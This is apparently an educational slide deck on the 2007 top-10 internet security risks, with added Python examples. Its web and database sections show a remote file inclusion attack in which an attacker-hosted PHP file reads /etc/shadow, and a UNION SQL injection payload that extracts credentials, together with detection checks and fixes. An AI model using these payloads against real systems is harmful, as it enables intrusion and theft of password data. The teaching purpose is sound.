
INTERNET SECURITY
Top-10 2007 Security Risks
Jitender Vig
Summary

Client-side Vulnerabilities
  - Web Browsers
  - Email Clients
  - Media Players

Server-side Vulnerabilities
  - Web Applications
  - Database Software

Security Policy and Personnel
  - Phishing/Spear Phishing

Application Abuse
  - Instant Messaging
  - Peer-to-Peer Programs

Zero Day Attacks


Client-side Vulnerabilities

Web Browsers

Products: Internet Explorer, Firefox, Adobe Reader, QuickTime

Vulnerability classes: ActiveX controls, HTML Help, the graphics (GDI) function SetAbortProc, spoofing, memory corruption, crafted URIs
Email Clients

Products: Microsoft Outlook, Mozilla Thunderbird

Vulnerability classes: buffer overflow, malformed code, memory corruption, JavaScript, denial of service
Media Players

Products: Windows Media Player, Apple QuickTime, Adobe Flash Player

Vulnerability classes: buffer overflow, crafted header, memory corruption, denial of service, HTTP Referer header handling
Client-side Vulnerabilities: Aims

What attackers use a compromised client for: spam, rootkits, phishing, denial of service, distribution of malware, botnets.
Server-Side Vulnerabilities

Client --- Network (Internet) --- Server: the vulnerabilities in this section sit on the server side and are reached across the network.
Web Applications

Remote file inclusion, as drawn on the slide. The site www.mysite.com serves index.php, which builds the name of the file to include from a request parameter:

    <?php
    include($page.'.php');
    ?>

A normal request such as www.mysite.com/index.php?page=index includes index.php. The hacker first fetches the page ($> wget www.mysite.com/index.php) to see how it is built, then supplies a page parameter that points at a host under their control, e.g. index.php?page=www.haxor.com/cat. The attacker-hosted file (shown on the slide as www.badguy.ru/cat.php) contains:

    <?php
    passthru("cat /etc/shadow");
    ?>

The server includes and executes it, and the response carries the password hashes back to the attacker:

    USER:PASSWORD
    root:S5AZl~]
    Linus:@e)&#$*^%
    Httpd:Jpzi5z@

Caveat: for include() to fetch the file over the network, the parameter must carry a scheme (http://www.haxor.com/cat, which becomes http://www.haxor.com/cat.php) and PHP's allow_url_fopen (and, from PHP 5.2, allow_url_include) must be enabled; without a scheme the value is resolved as a local path, which still permits local file inclusion. The fix is to never build an include path from user input: map the parameter onto a fixed list of allowed page names and reject everything else.
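The following is an added example, written in Python rather than PHP and not part of the original deck: it models what the slide's include($page.'.php') computes from the request parameter, adds the detection-side check a practitioner would put in front of such a parameter, and shows the allow-list form that removes the bug. The page names and hostnames in it are constructed for the example.

```python
"""Model of the slide's include($page.'.php') pattern (added example, not from the deck).

resolve_page_vulnerable() reproduces what the PHP code computes: the
user-supplied value plus '.php', with no validation, so a remote URL or a
traversal path is accepted as-is.  looks_like_inclusion_attack() is the
check a WAF or the application itself would apply to the parameter.
resolve_page_safe() is the hardened form: the parameter is a key into a
fixed allow-list and anything else is rejected.
"""
from urllib.parse import urlsplit

# Constructed allow-list of the pages the application actually ships.
ALLOWED_PAGES = {"index": "index.php", "news": "news.php", "contact": "contact.php"}


def resolve_page_vulnerable(page: str) -> str:
    """What include($page.'.php') opens: user input, unchecked."""
    return page + ".php"


def looks_like_inclusion_attack(page: str) -> bool:
    """Flag parameter values that would leave the application's own page set."""
    scheme = urlsplit(page).scheme
    return (
        scheme != ""            # http://, ftp://, php://, data:// ... (remote or wrapper include)
        or "/" in page          # any path component, e.g. www.haxor.com/cat or /etc/passwd
        or "\\" in page         # Windows path separator
        or ".." in page         # directory traversal
        or "\x00" in page       # null-byte truncation of the '.php' suffix (old PHP)
    )


def resolve_page_safe(page: str) -> str:
    """Hardened form: allow-list lookup; raise on anything unknown."""
    try:
        return ALLOWED_PAGES[page]
    except KeyError:
        raise ValueError(f"unknown page: {page!r}") from None


if __name__ == "__main__":
    for p in ["index", "www.haxor.com/cat", "http://www.haxor.com/cat", "../../etc/passwd"]:
        verdict = "attack" if looks_like_inclusion_attack(p) else "ok"
        print(f"{p!r}: include would open {resolve_page_vulnerable(p)!r} [{verdict}]")
```

The check is deliberately stricter than "does it start with http://": the slide's own value, www.haxor.com/cat, has no scheme and would be resolved locally, yet it is still outside the set of pages the application means to serve, so the path separator alone is enough to reject it.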
Database Software

SQL injection example from the slide (a MySQL UNION-based injection through the id parameter of admin.php):

    http://localhost/admin.php?module=news&id=-1 union select 0,1,database(),3,4,5,6,7 from membres--

The negative id makes the legitimate SELECT return no rows, the UNION appends a row under the attacker's control (here the database name in the third column, with the numbers padding the column count to match the original query), and the trailing -- comments out whatever the application appends after the id.

Other database software risks:
  - Use of default configurations with default user names and passwords.
  - Use of weak passwords for privileged accounts.
  - Buffer overflows in processes that listen on well known ports.
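As an added example (not from the original deck), the injection above run against a constructed SQLite database in Python: the vulnerable lookup concatenates the id into the query the way the slide's admin.php does, the payload follows the same shape (non-matching id, UNION padded to the column count, trailing comment) and pulls credentials out of a membres table, and the parameterised version of the same lookup returns nothing for it. The schema, rows and the credential in it are constructed for the demo.

```python
"""UNION-based SQL injection against a news lookup, and the parameterised fix.
Added example using Python's sqlite3 module; schema and data are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: a news table the page reads, and a
    membres table holding credentials the page was never meant to expose."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
        CREATE TABLE membres(id INTEGER, login TEXT, password TEXT);
        INSERT INTO membres VALUES (1, 'admin', 'S5AZl~]');
        """
    )
    return con


def get_news_vulnerable(con: sqlite3.Connection, news_id: str):
    """Query built by string concatenation, as the slide's admin.php does:
    whatever arrives in ?id= is parsed as SQL."""
    sql = "SELECT id, title, body FROM news WHERE id=" + news_id
    return con.execute(sql).fetchall()


def get_news_safe(con: sqlite3.Connection, news_id: str):
    """Parameterised query: the input is bound as a value, never parsed as SQL.
    Rejecting non-integers up front also keeps the error path quiet."""
    try:
        value = int(news_id)
    except ValueError:
        return []
    return con.execute("SELECT id, title, body FROM news WHERE id=?", (value,)).fetchall()


# Payload in the shape of the slide's: -1 matches no news row, the UNION selects
# three columns to match the original query's column count (0 pads the first),
# and -- comments out anything the application appends after the id.
PAYLOAD = "-1 union select 0, login, password from membres--"


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, id=1   :", get_news_vulnerable(con, "1"))
    print("vulnerable, payload:", get_news_vulnerable(con, PAYLOAD))
    print("safe, payload      :", get_news_safe(con, PAYLOAD))
```

The vulnerable lookup returns the admin login and password as if they were a news row, which is exactly why UNION injections are read out through whatever column the page displays; the parameterised lookup never hands the payload to the SQL parser.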
Security Policy and Personnel

Phishing/Spear Phishing

Application Abuse

Instant Messaging (IM)

Peer-to-Peer Programs

Zero Day Attacks
Conclusion

Internet security is hard because:

  - It is hard to counter unknown vulnerabilities in products.
  - Even security products themselves often have unknown vulnerabilities.
  - Abstraction favors the adversary.
  - Some problems (e.g., spam) are not technical in nature.
  - People are sloppy, greedy, and sometimes naïve.

End
